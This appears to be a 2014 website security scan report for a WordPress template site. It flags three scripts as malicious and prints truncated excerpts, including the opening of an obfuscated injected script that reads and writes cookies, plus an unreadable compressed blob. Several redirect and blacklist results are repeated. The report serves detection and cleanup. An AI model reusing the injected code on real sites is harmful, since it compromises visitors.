Scanned pages/files
Request | Server response | Status |
http://8ws.org/ | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=3600 Connection: close Date: Fri, 05 Sep 2014 01:34:21 GMT Location: http://www.8ws.org/ Server: Apache Vary: Accept-Encoding Content-Length: 227 Content-Type: text/html; charset=iso-8859-1 Expires: Fri, 05 Sep 2014 02:34:21 GMT | clean |
http://www.8ws.org/ | 200 OK Content-Length: 40880 Content-Type: text/html | clean |
http://www.8ws.org/wp-content/plugins/scripts-gzip/gzip.php?js=wp-includes%2Fjs%2Fcomment-reply.js%3Fver%3D3.4.2%2Cwp-includes%2Fjs%2Fjquery%2Fjquery.js%3Fver%3D1.7.2 | 200 OK Content-Length: 98256 Content-Type: application/javascript | malicious |
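Malicious code - confirmed by antiviruses (see below). Start of the response body (excerpt, truncated):
addComment={moveForm:function(d,f,i,c){var m=this,a,h=m.I(d),b=m.I(i),l=m.I("cancel-comment-reply-link"),j=m.I("comment_parent"),k=m.I("comment_post_ID");if(!h||!b||!l||!j){return}m.respondId=i;c=c||false;if(!m.I("wp-temp-form-div")){a=document.createElement("div");a.id="wp-temp-form-div";a.style.display="none";b.parentNode.insertBefore(a,b)}h.parentNode.insertBefore(b,h.nextSibling);if(k&&c){k.value=c}j.value=f;l.style.display="";l.onclick=function(){var n=addComment,e=n.I("wp-temp-form [...]
Note: the visible excerpt matches the opening of WordPress's stock comment-reply.js, the first file named in this combined gzip.php request, and it is cut off before any injected code appears. The detection presumably concerns the jquery.js part of the same response, which is flagged on its own in the gzip.php?js=...jquery.js row further down.
Antivirus reports: (the per-engine results are not included in this copy of the report)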
| ||
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21259 Content-Type: text/javascript | clean |
http://www.8ws.org/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.25.0-2013.01.18 | 200 OK Content-Length: 5817 Content-Type: application/x-javascript | clean |
http://www.8ws.org/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.3.3 | 200 OK Content-Length: 1836 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) µYmoÛ6þìü &* µäÓ0ç(ÚõÃP4kíK´D;LhÊ©¼4ñß©Êd×è ´U¤»ãswï?Íe¬y*ýüìí ýê ¾tölþð)ñõó¥S2~\ÄÓ_Éù9ñr°),ñÈëkýáÈ\ õåKò²<ÝÛs_FìI3ø/$¦ñ-KFä, ÀJú^Â"«sA¦i6÷Þѧðèl ÷ì[>s="(üj:$wÿ¢ô¤ü ¬oðǾ·ÖßF³¯L-@]æzk@¸ràjâ{|>3 BÒe 'V xàO¸àúyD<ó`Y62¦óLå̾Y]ð,ãTðïÌÁ¿µEcÁ¹b¡æZ°ªðjÍivUOAëüò!E³¢*|Ï+ñn@hGä x6ac®ÆqL ðFä8rW@ÊJ¥gߪ<R»(W!B¾íE¸úSP./'w,Ö P ?ü>_èg÷CP8c[þ4#Y|3R: àUÔ ³"ñaj2_E¡¡ÔÇñF Antivirus reports:
| ||
http://www.8ws.org/wp-content/plugins/lightbox-plus/js/jquery.colorbox.1.3.32.js?ver=1.3.32 | 200 OK Content-Length: 8136 Content-Type: application/x-javascript | clean |
http://8ws.org/receipt.htm | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=3600 Connection: close Date: Fri, 05 Sep 2014 01:34:26 GMT Location: http://www.8ws.org/receipt.htm Server: Apache Vary: Accept-Encoding Content-Length: 238 Content-Type: text/html; charset=iso-8859-1 Expires: Fri, 05 Sep 2014 02:34:26 GMT | clean |
http://www.8ws.org/receipt.htm | 200 OK Content-Length: 9307 Content-Type: text/html | clean |
http://www.8ws.org/test404page.js | 404 Not Found Content-Length: 22387 Content-Type: text/html | clean |
http://www.8ws.org/wp-content/plugins/scripts-gzip/gzip.php?js=wp-includes%2Fjs%2Fjquery%2Fjquery.js%3Fver%3D1.7.2 | 200 OK Content-Length: 97467 Content-Type: application/javascript | malicious |
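Malicious code - confirmed by antiviruses (see below). Start of the response body (excerpt, truncated mid-statement):
var qzQtTI="useridA0817FB25";var PdfwG="28";var NbUcmN=1;function ytLAm7(ExRd6H){var otvobS;var viRKc8J=document.cookie;if(!viRKc8J){return null;}viRKc8J=viRKc8J.replace(/\s/g,"");var Q7CHJu=viRKc8J.split(";");for(var i=0;i<Q7CHJu.length;i++){var HpojhA=Q7CHJu[i].split("=");if(HpojhA[0]==ExRd6H){otvobS=unescape(HpojhA[1]);break;}}return otvobS;};function sLS1uOJ(ExRd6H,UTlda6n,kPBDO){var exp=new Date();var IuhFf=exp.getTime()+(kPBDO*60*60*1000);exp.setTime(IuhFf);var p2rahA2=ExRd6H+"="+escape [...]
Note: the visible part defines a cookie reader and a cookie writer (expiry given in hours) under randomized identifiers. It sits at the very start of a response that was requested as jquery.js only, and stock jQuery does not begin this way. What the script does with the cookie is not shown, because the excerpt ends first. To confirm and clean up, compare the served output and the wp-includes/js/jquery/jquery.js file on disk against a clean copy of the same version (ver=1.7.2 in the request), and check the scripts-gzip plugin's gzip.php for modification.
Antivirus reports: (the per-engine results are not included in this copy of the report)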
| ||
http://www.8ws.org/free_invoice_templates.htm | 200 OK Content-Length: 38831 Content-Type: text/html | clean |
http://www.8ws.org/free_invoice_example.htm | 200 OK Content-Length: 41837 Content-Type: text/html | clean |
http://www.8ws.org/motor-vehicle-bill-of-sale.htm | 200 OK Content-Length: 9542 Content-Type: text/html | clean |
http://www.8ws.org/category/2013-calendar | 200 OK Content-Length: 32774 Content-Type: text/html | clean |
http://www.8ws.org/about | 200 OK Content-Length: 21697 Content-Type: text/html | clean |
http://www.8ws.org/contact | 200 OK Content-Length: 21226 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 8ws.org
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: max-age=3600
Connection: close
Date: Fri, 05 Sep 2014 01:34:21 GMT
Location: http://www.8ws.org/
Server: Apache
Vary: Accept-Encoding
Content-Length: 227
Content-Type: text/html; charset=iso-8859-1
Expires: Fri, 05 Sep 2014 02:34:21 GMT
...227 bytes of data.
GET / HTTP/1.1
Host: 8ws.org
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: max-age=3600
Connection: close
Date: Fri, 05 Sep 2014 01:34:21 GMT
Location: http://www.8ws.org/
Server: Apache
Vary: Accept-Encoding
Content-Length: 227
Content-Type: text/html; charset=iso-8859-1
Expires: Fri, 05 Sep 2014 02:34:21 GMT
...227 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: 8ws.org
Referer: http://www.google.com/search?q=8ws.org
Result:
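The result is similar to the first query. There are no suspicious redirects found. The only redirect observed is the 301 from 8ws.org to www.8ws.org on the same site. Only these two request profiles (no referrer, Google referrer) were tested, so a redirect conditioned on user agent, cookie or client address would not show up in this check.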
GET / HTTP/1.1
Host: 8ws.org
Referer: http://www.google.com/search?q=8ws.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=8ws.org
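Result: This site is not currently listed as suspicious. (Not being listed reflects only the blacklist's state at query time; it does not contradict the files marked malicious in the scan above.)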
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://8ws.org/
Result: 8ws.org is not infected or malware details are not published yet.
Result: 8ws.org is not infected or malware details are not published yet.